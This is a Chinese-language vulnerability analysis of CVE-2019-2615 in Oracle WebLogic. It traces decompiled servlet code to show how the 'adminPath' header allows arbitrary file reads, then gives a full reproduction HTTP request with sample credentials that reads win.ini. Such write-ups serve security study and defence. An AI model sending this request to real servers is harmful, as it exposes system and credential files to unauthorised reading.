(CVE-2019-2615)Weblogic 任意文件读取漏洞
==========================================
一、漏洞简介
------------
攻击者可以在已知用户名密码的情况下读取WebLogic服务器中的任意文件。
二、漏洞影响
------------
Weblogic 10.3.6.0Weblogic 12.1.3.0Weblogic 12.2.1.2Weblogic 12.2.1.3
三、复现过程
------------
### 漏洞分析
该功能的关键代码在
`weblogic.management.servlet.FileDistributionServlet`的doGet()方法中:
public void doGet(final HttpServletRequest var1, final HttpServletResponse var2) throws ServletException, IOException {
AuthenticatedSubject var3 = this.authenticateRequest(var1, var2);
if(var3 != null) {
final String var4 = var1.getHeader("wl_request_type");
if(var3 != KERNEL_ID) {
AdminResource var5 = new AdminResource("FileDownload", (String)null, var4);
if(!this.am.isAccessAllowed(var3, var5, (ContextHandler)null)) {
ManagementLogger.logErrorFDSUnauthorizedDownloadAttempt(var3.getName(), var4);
var2.sendError(401);
return;
}
}
try {
if(debugLogger.isDebugEnabled()) {
debugLogger.debug("---- >doGet incoming request: " + var4);
}
if(var4.equals("wl_xml_entity_request")) {
this.doGetXMLEntityRequest(var1, var2);
} else if(var4.equals("wl_jsp_refresh_request")) {
this.doGetJspRefreshRequest(var1, var2);
} else if(var4.equals("file")) {
this.doGetFile(var1, var2);
} else if(!var4.equals("wl_init_replica_request") && !var4.equals("wl_file_realm_request") && !var4.equals("wl_managed_server_independence_request")) {
var2.addHeader("ErrorMsg", "Bad request type");
String var10 = Utils.encodeXSS(var4);
var2.sendError(400, "Bad request type: " + var10);
ManagementLogger.logBadRequestInFileDistributionServlet(var4);
} else {
......
......
}
}
} catch (Exception var9) {
if(!Kernel.isInitialized()) {
throw new AssertionError("kernel not initialized");
}
ManagementLogger.logErrorInFileDistributionServlet(var4, var9);
}
}
}
代码也比较简单,先取request中header的参数\"wl\_request\_type\"的值,然后判断如果该值等于"wl\_xml\_entity\_request"、"wl\_jsp\_refresh\_request"、"file"\...\...则分别调用各自的方法,进入下一步判断。我们看一下如果wl\_request\_type的值为"wl\_jsp\_refresh\_request",进入doGetJspRefreshRequest()方法。我们跟入doGetJspRefreshRequest()方法:
private void doGetJspRefreshRequest(HttpServletRequest var1, HttpServletResponse var2) throws IOException {
String var3 = var1.getHeader("adminPath");
try {
FileInputStream var4 = new FileInputStream(var3);
try {
var2.setContentType("text/plain");
var2.setStatus(200);
this.returnInputStream(var4, var2.getOutputStream());
} finally {
var4.close();
}
} catch (IOException var10) {
String var5 = "I/O Exception getting resource: " + var10.getMessage();
var2.addHeader("ErrorMsg", var5);
var2.sendError(500, var5);
}
}
doGetJspRefreshRequest()方法中的"adminPath"也是request中的header参数,我们在Post包中传入要读取的文件。进入该方法中,直接使用FileInputStream类进行文件读取,故造成了所谓的"任意文件读取"漏洞。
### 漏洞复现
GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: www.0-sec.org:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
username:weblogic
password:admin123456
wl_request_type:wl_jsp_refresh_request
adminPath:c:\windows\win.ini
Upgrade-Insecure-Requests: 1
Weblogic任意文件读取漏洞/media/rId26.png)